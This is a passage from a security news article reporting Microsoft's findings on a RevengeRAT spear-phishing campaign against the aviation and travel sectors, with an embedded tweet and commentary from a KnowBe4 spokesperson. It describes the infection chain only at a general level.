“The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads,” Microsoft said.
Fly this #CyberEspionage #SpearPhishing straight to the moon: targeting #aviation w/ emails spoofing legit orgs, w/ lures re: travel/cargo https://t.co/JvoI1Ty7qf
— Threatpost (@threatpost) May 13, 2021
Once the RATs are active, they directly connect to a command and control (C2) server. And then proceed to download more malware from paste sites like pastebin.com.
“The RATs connect to a C2 server hosted on a dynamic hosting site to register with the attackers, and then uses a UTF-8-encoded PowerShell and fileless techniques to download three additional stages from pastebin[.]com or similar sites,” reports Microsoft Security Intelligence.
Sophisticated Phishing
Roger Grimes, tech evangelist at KnowBe4, comments on the RevengeRAT campaign. Grimes says that this type of campaign shows a new development in malware gang activity. And by specializing in attacking specific vertical sectors besides the usual, financial and government RevengeRat differs. They use precise lures in phishing emails. And the campaigns are tailored to a more directed attack.
